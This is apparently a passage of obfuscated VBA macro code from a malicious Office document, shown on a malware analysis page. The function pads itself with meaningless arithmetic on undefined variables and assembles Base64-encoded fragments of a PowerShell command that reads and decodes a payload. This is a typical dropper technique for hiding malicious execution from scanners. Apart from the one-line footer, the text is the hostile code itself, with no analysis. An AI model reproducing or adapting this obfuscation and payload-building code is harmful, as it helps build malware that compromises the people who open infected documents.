End Function
Function UVLbYB()
On Error Resume Next
nMVLJ = 64829 + Log(74660) - tFGrN / Atn(4986) / TQLHHa / zDDWW
DFbFSk = CSng(77682 * CInt(56591) + 62677 - 95626)
Xwirfi = "AXwAgACwAWwBz" + "AHkAUwB" + "UAEUAbQ" + "AuAFQARQBYAF" + "QALgBlAG4AYw" + "BPAEQASQ" + "BOA"
Ctvlj = 33385 + Log(14638) - iqMIMm / Atn(98703) / RNSImL / LniBY
OzmSGF = CSng(26964 * CInt(60541) + 69142 - 29785)
PowEw = "GcAXQA6ADo" + "AQQBTAEMAaQBpAC" + "AA" + "KQAgAH0A"
vZroqw = 29520 + Log(37423) - rWPOp / Atn(36406) / mjwFQi / QraqF
lNhwjM = CSng(24642 * CInt(37546) + 36111 - 40200)
SAoTarwrj = "IAApAC4AUgBlA" + "GEAR" + "ABUAG8ARQBuAEQ" + "AKAAgACkA"
UVLbYB = Xwirfi + PowEw + SAoTarwrj
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.